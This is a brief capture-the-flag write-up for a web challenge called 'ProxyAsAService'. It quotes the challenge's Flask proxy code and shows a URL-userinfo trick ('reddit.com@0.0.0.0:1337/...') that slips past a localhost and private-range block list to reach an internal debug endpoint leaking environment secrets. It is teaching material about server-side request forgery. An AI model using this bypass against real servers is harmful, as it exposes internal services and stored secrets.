Skip to content

ProxyAsAService

Append @attacker.com to a website, like http://example.com@attacker.com/ will redirect to http://attacker.com/

So, according to the source code, we need to visit http://localhost/debug/environment to get the flag in ENV

SITE_NAME = 'reddit.com'

proxy_api = Blueprint('proxy_api', __name__)
debug     = Blueprint('debug', __name__)


@proxy_api.route('/', methods=['GET', 'POST'])
def proxy():
    url = request.args.get('url')

    if not url:
        cat_meme_subreddits = [
            '/r/cats/',
            '/r/catpictures',
            '/r/catvideos/'
        ]

        random_subreddit = random.choice(cat_meme_subreddits)

        return redirect(url_for('.proxy', url=random_subreddit))

    target_url = f'http://{SITE_NAME}{url}'
    response, headers = proxy_req(target_url)

    return Response(response.content, response.status_code, headers.items())

target_url=http://reddit.com{url} To complete the challenge, we need to change it to :

target_url=http://reddit.com@0.0.0.0:1337/debug/environment

127 and localhost have been banned and the application is deployed on port 1337 locally.

RESTRICTED_URLS = ['localhost', '127.', '192.168.', '10.', '172.']

alt text

Further reading:

URL format bypass | HackTricks